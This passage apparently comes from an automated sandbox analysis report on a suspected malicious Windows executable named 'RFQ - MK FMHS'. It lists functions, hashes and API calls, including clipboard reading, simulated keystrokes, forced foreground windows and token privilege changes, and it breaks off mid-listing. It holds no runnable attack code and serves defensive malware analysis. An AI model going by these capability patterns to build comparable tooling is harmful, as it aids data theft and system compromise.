                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: 43553b4b060b2ba0e5cd99e9bd72fc94645f55e339ec4d888cb8bdc756d02bfc
                    • Instruction ID: ae2c85085dc7bba4fca82fecc295e7b67ddcecceb8d6c9092b2a81cd7ccddea3
                    • Opcode Fuzzy Hash: 43553b4b060b2ba0e5cd99e9bd72fc94645f55e339ec4d888cb8bdc756d02bfc
                    • Instruction Fuzzy Hash: A8E086369042285BD720D6989C05FFA77EDDFC9690F0541B5FD4CE7214D960AC818690
                    Function 00ED9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __fread_nolock
                    • String ID:
                    • API String ID: 2638373210-0
                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction ID: 0ac1b1bcc76d01ab2ba5355add70e9adab1e813c3519ccfe3e99af4777312635
                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction Fuzzy Hash: 81E092B1204B405FDB398A24DC107E373E0EB06319F00081DF29A93342EB6278428759
                    Function 00E75DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00EAE16B,?,?,00000000), ref: 00E75DBF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 6f166641d2e1311546a56d9dc16c2c1400a59593c15a7347f752ab0a8117a440
                    • Instruction ID: 77e83cb11b245ce01c6f46c0f5ae35bbaaadbd5e1c0e2734ee403b3d09983ee0
                    • Opcode Fuzzy Hash: 6f166641d2e1311546a56d9dc16c2c1400a59593c15a7347f752ab0a8117a440
                    • Instruction Fuzzy Hash: FBD0C77464020CBFE710DB81DC46FAD777CDB45710F100294FD0466390D6B27D548795
                    Function 00E9548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: 6b5f23f48cc1618d68bbb027b6ff49d513f4902ed6f7425cab236442077d6d80
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: E2B0927684020C77DE422E82EC02A593B599B40678F808020FB1C28162A673A6A09689
                    Function 00EDD2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000002,00000000), ref: 00EDD46A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID:
                    • API String ID: 1452528299-0
                    • Opcode ID: b8d5a4cf4687a2c8e3dd6aefff406a96a1861d65386a0d223d0746767bc4f2b6
                    • Instruction ID: 87b735159eb3ccbd777c41a91e4f49c1440187197139350bf7f679fc5a1a77ab
                    • Opcode Fuzzy Hash: b8d5a4cf4687a2c8e3dd6aefff406a96a1861d65386a0d223d0746767bc4f2b6
                    • Instruction Fuzzy Hash: EC7187316083018FC714EF24D891A6EB7E4EF88314F04556EF59AAB392DB70ED45CB52
                    Function 00E90E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: a9baceed18c1be8a8783994f2eeb7f6230cdae3ba21416acedd77025cc405ae3
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: 3331C471A00105DFCF18DF58D4809A9F7A6FF59304BA4AAA5E909EB651D731EEC1CBC0
                    Function 00E5229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 00E522B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639798335.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e50000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction ID: 7a2e7bd3db2af42ae3e66d32e6009b745e00a2ebb11ecd8031f21644bc47ed1b
                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction Fuzzy Hash: F5E0BF7594010EEFDB00EFA4D5496DE7BB4EF04312F1005A5FE05E7690DB309E548A62
                    Function 00E522A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 00E522B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639798335.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e50000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: f593daa0260e61329338545381e2da69b90be7c845c973726b6d68fc683cf50a
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: 31E0E67594010EEFDB00EFB4D54969E7FB4EF04302F100565FD05E2280D6309D508A72

                    Non-executed Functions

                    Function 00EFCDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00EFCE50
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EFCE91
                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00EFCED6
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EFCF00
                    • SendMessageW.USER32 ref: 00EFCF29
                    • _wcsncpy.LIBCMT ref: 00EFCFA1
                    • GetKeyState.USER32(00000011), ref: 00EFCFC2
                    • GetKeyState.USER32(00000009), ref: 00EFCFCF
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EFCFE5
                    • GetKeyState.USER32(00000010), ref: 00EFCFEF
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EFD018
                    • SendMessageW.USER32 ref: 00EFD03F
                    • SendMessageW.USER32(?,00001030,?,00EFB602), ref: 00EFD145
                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00EFD15B
                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EFD16E
                    • SetCapture.USER32(?), ref: 00EFD177
                    • ClientToScreen.USER32(?,?), ref: 00EFD1DC
                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EFD1E9
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EFD203
                    • ReleaseCapture.USER32 ref: 00EFD20E
                    • GetCursorPos.USER32(?), ref: 00EFD248
                    • ScreenToClient.USER32(?,?), ref: 00EFD255
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFD2B1
                    • SendMessageW.USER32 ref: 00EFD2DF
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFD31C
                    • SendMessageW.USER32 ref: 00EFD34B
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EFD36C
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EFD37B
                    • GetCursorPos.USER32(?), ref: 00EFD39B
                    • ScreenToClient.USER32(?,?), ref: 00EFD3A8
                    • GetParent.USER32(?), ref: 00EFD3C8
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EFD431
                    • SendMessageW.USER32 ref: 00EFD462
                    • ClientToScreen.USER32(?,?), ref: 00EFD4C0
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EFD4F0
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EFD51A
                    • SendMessageW.USER32 ref: 00EFD53D
                    • ClientToScreen.USER32(?,?), ref: 00EFD58F
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EFD5C3
                      • Part of subcall function 00E725DB: GetWindowLongW.USER32(?,000000EB), ref: 00E725EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 00EFD65F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F
                    • API String ID: 3977979337-4164748364
                    • Opcode ID: 0ea5d63b53b4e8c46a3add1ab36b503743afd40c7e0dbaa81d4da6c9a43acef4
                    • Instruction ID: e41f1ba0f6a21cb50ae367d4227e08ad0849353f0fb4905d04a61d5b0bad3d22
                    • Opcode Fuzzy Hash: 0ea5d63b53b4e8c46a3add1ab36b503743afd40c7e0dbaa81d4da6c9a43acef4
                    • Instruction Fuzzy Hash: 7C42BE34208249EFC721CF28C944ABABBE6FF88318F24551DF795E72A1C7319954DB92
                    Function 00EF804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00EF873F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: %d/%02d/%02d
                    • API String ID: 3850602802-328681919
                    • Opcode ID: 97f4cb4a8e172ae436f58afc4e2ba096fec8a77128781c1e6ddf086ce4c5e685
                    • Instruction ID: 9398fe6dec977e6771021a1600f4a7d201c9368c17588721315551a0d177c34e
                    • Opcode Fuzzy Hash: 97f4cb4a8e172ae436f58afc4e2ba096fec8a77128781c1e6ddf086ce4c5e685
                    • Instruction Fuzzy Hash: AC12CF71600208AFEB259F25CD49FBA7BB4EF85714F20A129FA15FA2E1DF708945CB50
                    Function 00E8710E Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                    • API String ID: 1357608183-2202602582
                    • Opcode ID: 13bb8b558f7bbe80e965ea1e56e3ff52b6cd6ece4682cb93c9945acfcced93a7
                    • Instruction ID: b3ac3811f2180078d5e50be5bf49e333ab54f583795be6c3a60c192f44920039
                    • Opcode Fuzzy Hash: 13bb8b558f7bbe80e965ea1e56e3ff52b6cd6ece4682cb93c9945acfcced93a7
                    • Instruction Fuzzy Hash: 6093A171A00215DBDB24DF68C981BEDB7B1FF48314F24916EE959BB290E7719E82CB40
                    Function 00E74A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 00E74A3D
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EADA8E
                    • IsIconic.USER32(?), ref: 00EADA97
                    • ShowWindow.USER32(?,00000009), ref: 00EADAA4
                    • SetForegroundWindow.USER32(?), ref: 00EADAAE
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EADAC4
                    • GetCurrentThreadId.KERNEL32 ref: 00EADACB
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EADAD7
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EADAE8
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EADAF0
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EADAF8
                    • SetForegroundWindow.USER32(?), ref: 00EADAFB
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB10
                    • keybd_event.USER32(00000012,00000000), ref: 00EADB1B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB25
                    • keybd_event.USER32(00000012,00000000), ref: 00EADB2A
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB33
                    • keybd_event.USER32(00000012,00000000), ref: 00EADB38
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EADB42
                    • keybd_event.USER32(00000012,00000000), ref: 00EADB47
                    • SetForegroundWindow.USER32(?), ref: 00EADB4A
                    • AttachThreadInput.USER32(?,?,00000000), ref: 00EADB71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: a44a17ffb747e6b8dd4b418a40815ec0ee227d858f208d79a5ad1639d9239997
                    • Instruction ID: a4d79d68a5dcc8cc0687976858f3d3be5a3f3610907c24bd549a36f563832894
                    • Opcode Fuzzy Hash: a44a17ffb747e6b8dd4b418a40815ec0ee227d858f208d79a5ad1639d9239997
                    • Instruction Fuzzy Hash: 8F317571A443187FEB206F629C49F7E7E6CEF88B50F114065FA05FA1D0CA705D10EAA0
                    Function 00EC8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EC8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EC8D0D
                      • Part of subcall function 00EC8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EC8D3A
                      • Part of subcall function 00EC8CC3: GetLastError.KERNEL32 ref: 00EC8D47
                    • _memset.LIBCMT ref: 00EC889B
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EC88ED
                    • CloseHandle.KERNEL32(?), ref: 00EC88FE
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EC8915
                    • GetProcessWindowStation.USER32 ref: 00EC892E
                    • SetProcessWindowStation.USER32(00000000), ref: 00EC8938
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EC8952
                      • Part of subcall function 00EC8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EC8851), ref: 00EC8728
                      • Part of subcall function 00EC8713: CloseHandle.KERNEL32(?,?,00EC8851), ref: 00EC873A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: 3a7267f9fe8f46f4d22c2638018cc4b4595f7bd4a036defcde5578c23c065513
                    • Instruction ID: 9cf9b6ad2472bc29359a4c49333e586e38c5f545538e73571b705b95ab00229b
                    • Opcode Fuzzy Hash: 3a7267f9fe8f46f4d22c2638018cc4b4595f7bd4a036defcde5578c23c065513
                    • Instruction Fuzzy Hash: D5813E71900209AFDF11DFA4DF45EEEBBB8AF04308F08516AF924B6161DB328E15DB60
                    Function 00EE425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                    Download Yara Rule
                    APIs
                    • OpenClipboard.USER32(00EFF910), ref: 00EE4284
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EE4292
                    • GetClipboardData.USER32(0000000D), ref: 00EE429A
                    • CloseClipboard.USER32 ref: 00EE42A6
                    • GlobalLock.KERNEL32(00000000), ref: 00EE42C2
                    • CloseClipboard.USER32 ref: 00EE42CC
                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00EE42E1
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00EE42EE
                    • GetClipboardData.USER32(00000001), ref: 00EE42F6
                    • GlobalLock.KERNEL32(00000000), ref: 00EE4303
                    • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00EE4337
                    • CloseClipboard.USER32 ref: 00EE4447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                    • String ID:
                    • API String ID: 3222323430-0
                    • Opcode ID: 35d5664b9b157503dfbe077f520430c99a038f126020faec93fbd38b23a5f443
                    • Instruction ID: 0aed93331d85cd1b4b5949e09b7f2d6799af5ab82db8fd52ffec5ec2e6f6319c
                    • Opcode Fuzzy Hash: 35d5664b9b157503dfbe077f520430c99a038f126020faec93fbd38b23a5f443
                    • Instruction Fuzzy Hash: FE51807120424AAFD311AF62EC95F7E77A8AF84B00F105529F55AF21E1DF70D909CB62
                    Function 00EDC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00EDC9F8
                    • FindClose.KERNEL32(00000000), ref: 00EDCA4C
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EDCA71
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EDCA88
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EDCAAF
                    • __swprintf.LIBCMT ref: 00EDCAFB
                    • __swprintf.LIBCMT ref: 00EDCB3E
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                    • __swprintf.LIBCMT ref: 00EDCB92
                      • Part of subcall function 00E938D8: __woutput_l.LIBCMT ref: 00E93931
                    • __swprintf.LIBCMT ref: 00EDCBE0
                      • Part of subcall function 00E938D8: __flsbuf.LIBCMT ref: 00E93953
                      • Part of subcall function 00E938D8: __flsbuf.LIBCMT ref: 00E9396B
                    • __swprintf.LIBCMT ref: 00EDCC2F
                    • __swprintf.LIBCMT ref: 00EDCC7E
                    • __swprintf.LIBCMT ref: 00EDCCCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: 47fe528991b849885bd9c9e9260c1f866a2691eb7aa83f25754c84e759f31ebe
                    • Instruction ID: 84bb4eb12842f8eaa2c7150b76094f2a2e7f8d2a50ddc4166f6be945a7fe2c85
                    • Opcode Fuzzy Hash: 47fe528991b849885bd9c9e9260c1f866a2691eb7aa83f25754c84e759f31ebe
                    • Instruction Fuzzy Hash: F4A152B1508305ABC714EB64C885DAFB7ECFF94700F40592AF599E7192EB34DA09CB62
                    Function 00EDF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EDF221
                    • _wcscmp.LIBCMT ref: 00EDF236
                    • _wcscmp.LIBCMT ref: 00EDF24D
                    • GetFileAttributesW.KERNEL32(?), ref: 00EDF25F
                    • SetFileAttributesW.KERNEL32(?,?), ref: 00EDF279
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00EDF291
                    • FindClose.KERNEL32(00000000), ref: 00EDF29C
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00EDF2B8
                    • _wcscmp.LIBCMT ref: 00EDF2DF
                    • _wcscmp.LIBCMT ref: 00EDF2F6
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00EDF308
                    • SetCurrentDirectoryW.KERNEL32(00F2A5A0), ref: 00EDF326
